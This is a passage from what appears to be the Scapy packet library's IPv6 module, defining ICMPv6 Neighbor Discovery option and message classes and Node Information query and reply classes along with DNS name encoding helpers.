1885 tmp_len = len(s)
1886 return s[:tmp_len - (tmp_len % 8)]
1887
1888 def i2len(self, pkt, i):
1889 return len(self.i2m(pkt, i))
1890
1891
1892class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1893 name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1894 fields_desc = [ByteField("type", 4),
1895 FieldLenField("len", None, length_of="pkt", fmt="B",
1896 adjust=lambda pkt, x: (x + 8) // 8),
1897 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1898 TruncPktLenField("pkt", b"", IPv6,
1899 length_from=lambda pkt: 8 * pkt.len - 8)]
1900
1901# See which value should be used for default MTU instead of 1280
1902
1903
1904class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1905 name = "ICMPv6 Neighbor Discovery Option - MTU"
1906 fields_desc = [ByteField("type", 5),
1907 ByteField("len", 1),
1908 XShortField("res", 0),
1909 IntField("mtu", 1280)]
1910
1911 def mysummary(self):
1912 return self.sprintf("%name% %mtu%")
1913
1914
1915class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
1916 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1917 fields_desc = [ByteField("type", 6),
1918 ByteField("len", 1),
1919 ByteField("shortcutlim", 40), # XXX
1920 ByteField("res1", 0),
1921 IntField("res2", 0)]
1922
1923
1924class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1925 name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1926 fields_desc = [ByteField("type", 7),
1927 ByteField("len", 1),
1928 ShortField("res", 0),
1929 IntField("advint", 0)]
1930
1931 def mysummary(self):
1932 return self.sprintf("%name% %advint% milliseconds")
1933
1934
1935class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1936 name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1937 fields_desc = [ByteField("type", 8),
1938 ByteField("len", 1),
1939 ShortField("res", 0),
1940 ShortField("pref", 0),
1941 ShortField("lifetime", 1)]
1942
1943 def mysummary(self):
1944 return self.sprintf("%name% %pref% %lifetime% seconds")
1945
1946# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1947
1948# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1949
1950
1951class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1952 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1953 fields_desc = [ByteField("type", 17),
1954 ByteField("len", 3),
1955 ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1956 2: "New Care-Of Address",
1957 3: "NAR's IP address"}),
1958 ByteField("plen", 64),
1959 IntField("res", 0),
1960 IP6Field("addr", "::")]
1961
1962
1963class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1964 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
1965 fields_desc = [ByteField("type", 18),
1966 ByteField("len", 3),
1967 ByteField("optcode", 0),
1968 ByteField("plen", 64),
1969 IntField("res", 0),
1970 IP6Field("prefix", "::")]
1971
1972
1973_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1974 1: "LLA for the new AP",
1975 2: "LLA of the MN",
1976 3: "LLA of the NAR",
1977 4: "LLA of the src of TrSolPr or PrRtAdv msg",
1978 5: "AP identified by LLA belongs to current iface of router", # noqa: E501
1979 6: "No preifx info available for AP identified by the LLA", # noqa: E501
1980 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
1981
1982
1983class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1984 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
1985 fields_desc = [ByteField("type", 19),
1986 ByteField("len", 1),
1987 ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1988 MACField("lla", ETHER_ANY)] # We only support ethernet
1989
1990
1991class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
1992 name = "ICMPv6 Neighbor Discovery - MAP Option"
1993 fields_desc = [ByteField("type", 23),
1994 ByteField("len", 3),
1995 BitField("dist", 1, 4),
1996 BitField("pref", 15, 4), # highest availability
1997 BitField("R", 1, 1),
1998 BitField("res", 0, 7),
1999 IntField("validlifetime", 0xffffffff),
2000 IP6Field("addr", "::")]
2001
2002
2003class _IP6PrefixField(IP6Field):
2004 __slots__ = ["length_from"]
2005
2006 def __init__(self, name, default):
2007 IP6Field.__init__(self, name, default)
2008 self.length_from = lambda pkt: 8 * (pkt.len - 1)
2009
2010 def addfield(self, pkt, s, val):
2011 return s + self.i2m(pkt, val)
2012
2013 def getfield(self, pkt, s):
2014 tmp_len = self.length_from(pkt)
2015 p = s[:tmp_len]
2016 if tmp_len < 16:
2017 p += b'\x00' * (16 - tmp_len)
2018 return s[tmp_len:], self.m2i(pkt, p)
2019
2020 def i2len(self, pkt, x):
2021 return len(self.i2m(pkt, x))
2022
2023 def i2m(self, pkt, x):
2024 tmp_len = pkt.len
2025
2026 if x is None:
2027 x = "::"
2028 if tmp_len is None:
2029 tmp_len = 1
2030 x = inet_pton(socket.AF_INET6, x)
2031
2032 if tmp_len is None:
2033 return x
2034 if tmp_len in [0, 1]:
2035 return b""
2036 if tmp_len in [2, 3]:
2037 return x[:8 * (tmp_len - 1)]
2038
2039 return x + b'\x00' * 8 * (tmp_len - 3)
2040
2041
2042class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
2043 name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2044 fields_desc = [ByteField("type", 24),
2045 FieldLenField("len", None, length_of="prefix", fmt="B",
2046 adjust=lambda pkt, x: x // 8 + 1),
2047 ByteField("plen", None),
2048 BitField("res1", 0, 3),
2049 BitEnumField("prf", 0, 2, icmp6ndraprefs),
2050 BitField("res2", 0, 3),
2051 IntField("rtlifetime", 0xffffffff),
2052 _IP6PrefixField("prefix", None)]
2053
2054 def mysummary(self):
2055 return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2056
2057
2058class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
2059 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2060 fields_desc = [ByteField("type", 25),
2061 FieldLenField("len", None, count_of="dns", fmt="B",
2062 adjust=lambda pkt, x: 2 * x + 1),
2063 ShortField("res", None),
2064 IntField("lifetime", 0xffffffff),
2065 IP6ListField("dns", [],
2066 length_from=lambda pkt: 8 * (pkt.len - 1))]
2067
2068 def mysummary(self):
2069 return self.sprintf("%name% ") + ", ".join(self.dns)
2070
2071
2072class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
2073 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2074 fields_desc = [ByteField("type", 26),
2075 ByteField("len", 1),
2076 BitField("res", 0, 48)]
2077
2078# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2079# described in section 3.1 of RFC 1035
2080# XXX Label should be at most 63 octets in length : we do not enforce it
2081# Total length of domain should be 255 : we do not enforce it either
2082
2083
2084class DomainNameListField(StrLenField):
2085 __slots__ = ["padded"]
2086 islist = 1
2087 padded_unit = 8
2088
2089 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
2090 self.padded = padded
2091 StrLenField.__init__(self, name, default, length_from=length_from)
2092
2093 def i2len(self, pkt, x):
2094 return len(self.i2m(pkt, x))
2095
2096 def i2h(self, pkt, x):
2097 if not x:
2098 return []
2099 return x
2100
2101 def m2i(self, pkt, x):
2102 x = plain_str(x) # Decode bytes to string
2103 res = []
2104 while x:
2105 # Get a name until \x00 is reached
2106 cur = []
2107 while x and ord(x[0]) != 0:
2108 tmp_len = ord(x[0])
2109 cur.append(x[1:tmp_len + 1])
2110 x = x[tmp_len + 1:]
2111 if self.padded:
2112 # Discard following \x00 in padded mode
2113 if len(cur):
2114 res.append(".".join(cur) + ".")
2115 else:
2116 # Store the current name
2117 res.append(".".join(cur) + ".")
2118 if x and ord(x[0]) == 0:
2119 x = x[1:]
2120 return res
2121
2122 def i2m(self, pkt, x):
2123 def conditionalTrailingDot(z):
2124 if z and orb(z[-1]) == 0:
2125 return z
2126 return z + b'\x00'
2127 # Build the encode names
2128 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
2129 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2130
2131 # In padded mode, add some \x00 bytes
2132 if self.padded and not len(ret_string) % self.padded_unit == 0:
2133 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
2134
2135 return ret_string
2136
2137
2138class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
2139 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2140 fields_desc = [ByteField("type", 31),
2141 FieldLenField("len", None, length_of="searchlist", fmt="B",
2142 adjust=lambda pkt, x: 1 + x // 8),
2143 ShortField("res", None),
2144 IntField("lifetime", 0xffffffff),
2145 DomainNameListField("searchlist", [],
2146 length_from=lambda pkt: 8 * pkt.len - 8,
2147 padded=True)
2148 ]
2149
2150 def mysummary(self):
2151 return self.sprintf("%name% ") + ", ".join(self.searchlist)
2152
2153
2154class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910
2155 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2156 fields_desc = [ByteField("type", 37),
2157 FieldLenField("len", None, length_of="URI", fmt="B",
2158 adjust=lambda pkt, x: (2 + x) // 8),
2159 ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2160 length_from=lambda pkt:
2161 8 * max(pkt.len, 1) - 2)]
2162
2163 def mysummary(self):
2164 return self.sprintf("%name% %URI%")
2165
2166
2167class _PREF64(IP6Field):
2168 def addfield(self, pkt, s, val):
2169 return s + self.i2m(pkt, val)[:12]
2170
2171 def getfield(self, pkt, s):
2172 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2173
2174
2175class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781
2176 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2177 fields_desc = [ByteField("type", 38),
2178 ByteField("len", 2),
2179 BitField("scaledlifetime", 0, 13),
2180 BitEnumField("plc", 0, 3,
2181 ["/96", "/64", "/56", "/48", "/40", "/32"]),
2182 _PREF64("prefix", "::")]
2183
2184 def mysummary(self):
2185 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2186 return self.sprintf("%name% %prefix%") + plc
2187
2188# End of ICMPv6 Neighbor Discovery Options.
2189
2190
2191class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2192 name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2193 fields_desc = [ByteEnumField("type", 133, icmp6types),
2194 ByteField("code", 0),
2195 XShortField("cksum", None),
2196 IntField("res", 0)]
2197 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2198
2199
2200class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2201 name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2202 fields_desc = [ByteEnumField("type", 134, icmp6types),
2203 ByteField("code", 0),
2204 XShortField("cksum", None),
2205 ByteField("chlim", 0),
2206 BitField("M", 0, 1),
2207 BitField("O", 0, 1),
2208 BitField("H", 0, 1),
2209 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
2210 BitField("P", 0, 1),
2211 BitField("res", 0, 2),
2212 ShortField("routerlifetime", 1800),
2213 IntField("reachabletime", 0),
2214 IntField("retranstimer", 0)]
2215 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2216
2217 def answers(self, other):
2218 return isinstance(other, ICMPv6ND_RS)
2219
2220 def mysummary(self):
2221 return self.sprintf("%name% Lifetime %routerlifetime% "
2222 "Hop Limit %chlim% Preference %prf% "
2223 "Managed %M% Other %O% Home %H%")
2224
2225
2226class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2227 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2228 fields_desc = [ByteEnumField("type", 135, icmp6types),
2229 ByteField("code", 0),
2230 XShortField("cksum", None),
2231 IntField("res", 0),
2232 IP6Field("tgt", "::")]
2233 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2234
2235 def mysummary(self):
2236 return self.sprintf("%name% (tgt: %tgt%)")
2237
2238 def hashret(self):
2239 return bytes_encode(self.tgt) + self.payload.hashret()
2240
2241
2242class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2243 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2244 fields_desc = [ByteEnumField("type", 136, icmp6types),
2245 ByteField("code", 0),
2246 XShortField("cksum", None),
2247 BitField("R", 1, 1),
2248 BitField("S", 0, 1),
2249 BitField("O", 1, 1),
2250 XBitField("res", 0, 29),
2251 IP6Field("tgt", "::")]
2252 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2253
2254 def mysummary(self):
2255 return self.sprintf("%name% (tgt: %tgt%)")
2256
2257 def hashret(self):
2258 return bytes_encode(self.tgt) + self.payload.hashret()
2259
2260 def answers(self, other):
2261 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2262
2263# associated possible options : target link-layer option, Redirected header
2264
2265
2266class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2267 name = "ICMPv6 Neighbor Discovery - Redirect"
2268 fields_desc = [ByteEnumField("type", 137, icmp6types),
2269 ByteField("code", 0),
2270 XShortField("cksum", None),
2271 XIntField("res", 0),
2272 IP6Field("tgt", "::"),
2273 IP6Field("dst", "::")]
2274 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2275
2276
2277# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2278
2279class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2280 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2281 fields_desc = [ByteField("type", 9),
2282 FieldLenField("len", None, count_of="addrlist", fmt="B",
2283 adjust=lambda pkt, x: 2 * x + 1),
2284 StrFixedLenField("res", b"\x00" * 6, 6),
2285 IP6ListField("addrlist", [],
2286 length_from=lambda pkt: 8 * (pkt.len - 1))]
2287
2288
2289class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2290 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2291 type = 10
2292
2293
2294# RFC3122
2295# Options requises : source lladdr et target lladdr
2296# Autres options valides : source address list, MTU
2297# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2298# demandee dans l'option requise target lladdr et l'utiliser au niveau
2299# de l'adresse destination ethernet si aucune adresse n'est precisee
2300# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2301# les options.
2302# Ether() must use the target lladdr as destination
2303class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2304 name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2305 fields_desc = [ByteEnumField("type", 141, icmp6types),
2306 ByteField("code", 0),
2307 XShortField("cksum", None),
2308 XIntField("reserved", 0)]
2309 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2310
2311# Options requises : target lladdr, target address list
2312# Autres options valides : MTU
2313
2314
2315class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2316 name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2317 fields_desc = [ByteEnumField("type", 142, icmp6types),
2318 ByteField("code", 0),
2319 XShortField("cksum", None),
2320 XIntField("reserved", 0)]
2321 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2322
2323
2324###############################################################################
2325# ICMPv6 Node Information Queries (RFC 4620)
2326###############################################################################
2327
2328# [ ] Add automatic destination address computation using computeNIGroupAddr
2329# in IPv6 class (Scapy6 modification when integrated) if :
2330# - it is not provided
2331# - upper layer is ICMPv6NIQueryName() with a valid value
2332# [ ] Try to be liberal in what we accept as internal values for _explicit_
2333# DNS elements provided by users. Any string should be considered
2334# valid and kept like it has been provided. At the moment, i2repr() will
2335# crash on many inputs
2336# [ ] Do the documentation
2337# [ ] Add regression tests
2338# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2339# [ ] Check if there are differences between different stacks. Among *BSD,
2340# with others.
2341# [ ] Deal with flags in a consistent way.
2342# [ ] Implement compression in names2dnsrepr() and decompresiion in
2343# dnsrepr2names(). Should be deactivable.
2344
2345icmp6_niqtypes = {0: "NOOP",
2346 2: "Node Name",
2347 3: "IPv6 Address",
2348 4: "IPv4 Address"}
2349
2350
2351class _ICMPv6NIHashret:
2352 def hashret(self):
2353 return bytes_encode(self.nonce)
2354
2355
2356class _ICMPv6NIAnswers:
2357 def answers(self, other):
2358 return self.nonce == other.nonce
2359
2360# Buggy; always returns the same value during a session
2361
2362
2363class NonceField(StrFixedLenField):
2364 def __init__(self, name, default=None):
2365 StrFixedLenField.__init__(self, name, default, 8)
2366 if default is None:
2367 self.default = self.randval()
2368
2369
2370@conf.commands.register
2371def computeNIGroupAddr(name):
2372 """Compute the NI group Address. Can take a FQDN as input parameter"""
2373 name = name.lower().split(".")[0]
2374 record = chr(len(name)) + name
2375 h = md5(record.encode("utf8"))
2376 h = h.digest()
2377 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2378 return addr
2379
2380
2381# Here is the deal. First, that protocol is a piece of shit. Then, we
2382# provide 4 classes for the different kinds of Requests (one for every
2383# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2384# data field class that is made to be smart by guessing the specific
2385# type of value provided :
2386#
2387# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2388# if not overridden by user
2389# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2390# if not overridden
2391# - Name in the other cases: code is set to 0, if not overridden by user
2392#
2393# Internal storage, is not only the value, but the a pair providing
2394# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2395#
2396# Note : I merged getfield() and m2i(). m2i() should not be called
2397# directly anyway. Same remark for addfield() and i2m()
2398#
2399# -- arno
2400
2401# "The type of information present in the Data field of a query is
2402# declared by the ICMP Code, whereas the type of information in a
2403# Reply is determined by the Qtype"
2404
2405def names2dnsrepr(x):
2406 """
2407 Take as input a list of DNS names or a single DNS name
2408 and encode it in DNS format (with possible compression)
2409 If a string that is already a DNS name in DNS format
2410 is passed, it is returned unmodified. Result is a string.
2411 !!! At the moment, compression is not implemented !!!
2412 """
2413
2414 if isinstance(x, bytes):
2415 if x and x[-1:] == b'\x00': # stupid heuristic
2416 return x
2417 x = [x]
2418
2419 res = []
2420 for n in x:
2421 termin = b"\x00"
2422 if n.count(b'.') == 0: # single-component gets one more
2423 termin += b'\x00'
2424 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2425 res.append(n)
2426 return b"".join(res)
2427
2428
2429def dnsrepr2names(x):
2430 """
2431 Take as input a DNS encoded string (possibly compressed)
2432 and returns a list of DNS names contained in it.
2433 If provided string is already in printable format
2434 (does not end with a null character, a one element list
2435 is returned). Result is a list.
2436 """
2437 res = []
2438 cur = b""
2439 while x:
2440 tmp_len = orb(x[0])
2441 x = x[1:]
2442 if not tmp_len:
2443 if cur and cur[-1:] == b'.':
2444 cur = cur[:-1]
2445 res.append(cur)
2446 cur = b""
2447 if x and orb(x[0]) == 0: # single component
2448 x = x[1:]
2449 continue
2450 if tmp_len & 0xc0: # XXX TODO : work on that -- arno
2451 raise Exception("DNS message can't be compressed at this point!")
2452 cur += x[:tmp_len] + b"."
2453 x = x[tmp_len:]
2454 return res
2455
2456
2457class NIQueryDataField(StrField):
2458 def __init__(self, name, default):
2459 StrField.__init__(self, name, default)
2460
2461 def i2h(self, pkt, x):
2462 if x is None:
2463 return x
2464 t, val = x
2465 if t == 1:
2466 val = dnsrepr2names(val)[0]
2467 return val
2468
2469 def h2i(self, pkt, x):
2470 if x is tuple and isinstance(x[0], int):
2471 return x
2472
2473 # Try IPv6
2474 try:
2475 inet_pton(socket.AF_INET6, x.decode())
2476 return (0, x.decode())
2477 except Exception:
2478 pass
2479 # Try IPv4
2480 try:
2481 inet_pton(socket.AF_INET, x.decode())
2482 return (2, x.decode())
2483 except Exception:
2484 pass
2485 # Try DNS
2486 if x is None:
2487 x = b""
2488 x = names2dnsrepr(x)
2489 return (1, x)
2490
2491 def i2repr(self, pkt, x):
2492 t, val = x
2493 if t == 1: # DNS Name
2494 # we don't use dnsrepr2names() to deal with
2495 # possible weird data extracted info
2496 res = []
2497 while val:
2498 tmp_len = orb(val[0])
2499 val = val[1:]
2500 if tmp_len == 0:
2501 break
2502 res.append(plain_str(val[:tmp_len]) + ".")
2503 val = val[tmp_len:]
2504 tmp = "".join(res)
2505 if tmp and tmp[-1] == '.':
2506 tmp = tmp[:-1]
2507 return tmp
2508 return repr(val)
2509
2510 def getfield(self, pkt, s):
2511 qtype = getattr(pkt, "qtype")
2512 if qtype == 0: # NOOP
2513 return s, (0, b"")
2514 else:
2515 code = getattr(pkt, "code")
2516 if code == 0: # IPv6 Addr
2517 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2518 elif code == 2: # IPv4 Addr
2519 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2520 else: # Name or Unknown
2521 return b"", (1, s)
2522
2523 def addfield(self, pkt, s, val):
2524 if ((isinstance(val, tuple) and val[1] is None) or
2525 val is None):
2526 val = (1, b"")
2527 t = val[0]
2528 if t == 1:
2529 return s + val[1]
2530 elif t == 0:
2531 return s + inet_pton(socket.AF_INET6, val[1])
2532 else:
2533 return s + inet_pton(socket.AF_INET, val[1])
2534
2535
2536class NIQueryCodeField(ByteEnumField):
2537 def i2m(self, pkt, x):
2538 if x is None:
2539 d = pkt.getfieldval("data")
2540 if d is None:
2541 return 1
2542 elif d[0] == 0: # IPv6 address
2543 return 0
2544 elif d[0] == 1: # Name
2545 return 1
2546 elif d[0] == 2: # IPv4 address
2547 return 2
2548 else:
2549 return 1
2550 return x
2551
2552
2553_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2554
2555# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2556# 8: "Link-local addresses", 16: "Site-local addresses",
2557# 32: "Global addresses" }
2558
2559# "This NI type has no defined flags and never has a Data Field". Used
2560# to know if the destination is up and implements NI protocol.
2561
2562
2563class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2564 name = "ICMPv6 Node Information Query - NOOP Query"
2565 fields_desc = [ByteEnumField("type", 139, icmp6types),
2566 NIQueryCodeField("code", None, _niquery_code),
2567 XShortField("cksum", None),
2568 ShortEnumField("qtype", 0, icmp6_niqtypes),
2569 BitField("unused", 0, 10),
2570 FlagsField("flags", 0, 6, "TACLSG"),
2571 NonceField("nonce", None),
2572 NIQueryDataField("data", None)]
2573
2574
2575class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2576 name = "ICMPv6 Node Information Query - IPv6 Name Query"
2577 qtype = 2
2578
2579# We ask for the IPv6 address of the peer
2580
2581
2582class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2583 name = "ICMPv6 Node Information Query - IPv6 Address Query"
2584 qtype = 3
2585 flags = 0x3E
2586
2587
2588class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2589 name = "ICMPv6 Node Information Query - IPv4 Address Query"
2590 qtype = 4
2591
2592
2593_nireply_code = {0: "Successful Reply",
2594 1: "Response Refusal",
2595 3: "Unknown query type"}
2596
2597_nireply_flags = {1: "Reply set incomplete",
2598 2: "All unicast addresses",
2599 4: "IPv4 addresses",
2600 8: "Link-local addresses",
2601 16: "Site-local addresses",
2602 32: "Global addresses"}
2603
2604# Internal repr is one of those :
2605# (0, "some string") : unknown qtype value are mapped to that one
2606# (3, [ (ttl, ip6), ... ])
2607# (4, [ (ttl, ip4), ... ])
2608# (2, [ttl, dns_names]) : dns_names is one string that contains
2609# all the DNS names. Internally it is kept ready to be sent
2610# (undissected). i2repr() decode it for user. This is to
2611# make build after dissection bijective.
2612#
2613# I also merged getfield() and m2i(), and addfield() and i2m().
2614
2615
2616class NIReplyDataField(StrField):
2617
2618 def i2h(self, pkt, x):
2619 if x is None:
2620 return x
2621 t, val = x
2622 if t == 2:
2623 ttl, dnsnames = val
2624 val = [ttl] + dnsrepr2names(dnsnames)
2625 return val
2626
2627 def h2i(self, pkt, x):
2628 qtype = 0 # We will decode it as string if not
2629 # overridden through 'qtype' in pkt
2630
2631 # No user hint, let's use 'qtype' value for that purpose
2632 if not isinstance(x, tuple):
2633 if pkt is not None:
2634 qtype = pkt.qtype
2635 else:
2636 qtype = x[0]
2637 x = x[1]
2638
2639 # From that point on, x is the value (second element of the tuple)
2640
2641 if qtype == 2: # DNS name
2642 if isinstance(x, (str, bytes)): # listify the string
2643 x = [x]
2644 if isinstance(x, list):
2645 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
2646 if x and isinstance(x[0], int):
2647 ttl = x[0]
2648 names = x[1:]
2649 else:
2650 ttl = 0
2651 names = x
2652 return (2, [ttl, names2dnsrepr(names)])
2653
2654 elif qtype in [3, 4]: # IPv4 or IPv6 addr
2655 if not isinstance(x, list):
2656 x = [x] # User directly provided an IP, instead of list
2657
2658 def fixvalue(x):
2659 # List elements are not tuples, user probably
2660 # omitted ttl value : we will use 0 instead
2661 if not isinstance(x, tuple):
2662 x = (0, x)
2663 # Decode bytes
2664 if isinstance(x[1], bytes):
2665 x = (x[0], x[1].decode())
2666 return x
2667
2668 return (qtype, [fixvalue(d) for d in x])
2669
2670 return (qtype, x)
2671
2672 def addfield(self, pkt, s, val):
2673 t, tmp = val
2674 if tmp is None:
2675 tmp = b""
2676 if t == 2:
2677 ttl, dnsstr = tmp
2678 return s + struct.pack("!I", ttl) + dnsstr
2679 elif t == 3:
2680 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
2681 elif t == 4:
2682 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
2683 else:
2684 return s + tmp
2685
2686 def getfield(self, pkt, s):
2687 code = getattr(pkt, "code")
2688 if code != 0:
2689 return s, (0, b"")
2690
2691 qtype = getattr(pkt, "qtype")
2692 if qtype == 0: # NOOP
2693 return s, (0, b"")
2694
2695 elif qtype == 2:
2696 if len(s) < 4:
2697 return s, (0, b"")
2698 ttl = struct.unpack("!I", s[:4])[0]
2699 return b"", (2, [ttl, s[4:]])
2700
2701 elif qtype == 3: # IPv6 addresses with TTLs
2702 # XXX TODO : get the real length
2703 res = []
2704 while len(s) >= 20: # 4 + 16
2705 ttl = struct.unpack("!I", s[:4])[0]
2706 ip = inet_ntop(socket.AF_INET6, s[4:20])
2707 res.append((ttl, ip))
2708 s = s[20:]
2709 return s, (3, res)
2710
2711 elif qtype == 4: # IPv4 addresses with TTLs
2712 # XXX TODO : get the real length
2713 res = []
2714 while len(s) >= 8: # 4 + 4
2715 ttl = struct.unpack("!I", s[:4])[0]
2716 ip = inet_ntop(socket.AF_INET, s[4:8])
2717 res.append((ttl, ip))
2718 s = s[8:]
2719 return s, (4, res)
2720 else:
2721 # XXX TODO : implement me and deal with real length
2722 return b"", (0, s)
2723
2724 def i2repr(self, pkt, x):
2725 if x is None:
2726 return "[]"
2727
2728 if isinstance(x, tuple) and len(x) == 2:
2729 t, val = x
2730 if t == 2: # DNS names
2731 ttl, tmp_len = val
2732 tmp_len = dnsrepr2names(tmp_len)
2733 names_list = (plain_str(name) for name in tmp_len)
2734 return "ttl:%d %s" % (ttl, ",".join(names_list))
2735 elif t == 3 or t == 4:
2736 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
2737 return repr(val)
2738 return repr(x) # XXX should not happen
2739
2740# By default, sent responses have code set to 0 (successful)
2741
2742
2743class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2744 name = "ICMPv6 Node Information Reply - NOOP Reply"
2745 fields_desc = [ByteEnumField("type", 140, icmp6types),
2746 ByteEnumField("code", 0, _nireply_code),
2747 XShortField("cksum", None),
2748 ShortEnumField("qtype", 0, icmp6_niqtypes),
2749 BitField("unused", 0, 10),
2750 FlagsField("flags", 0, 6, "TACLSG"),
2751 NonceField("nonce", None),
2752 NIReplyDataField("data", None)]
2753
2754
2755class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2756 name = "ICMPv6 Node Information Reply - Node Names"
2757 qtype = 2
2758
2759
2760class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2761 name = "ICMPv6 Node Information Reply - IPv6 addresses"
2762 qtype = 3
2763
2764
2765class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2766 name = "ICMPv6 Node Information Reply - IPv4 addresses"
2767 qtype = 4
2768
2769
2770class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
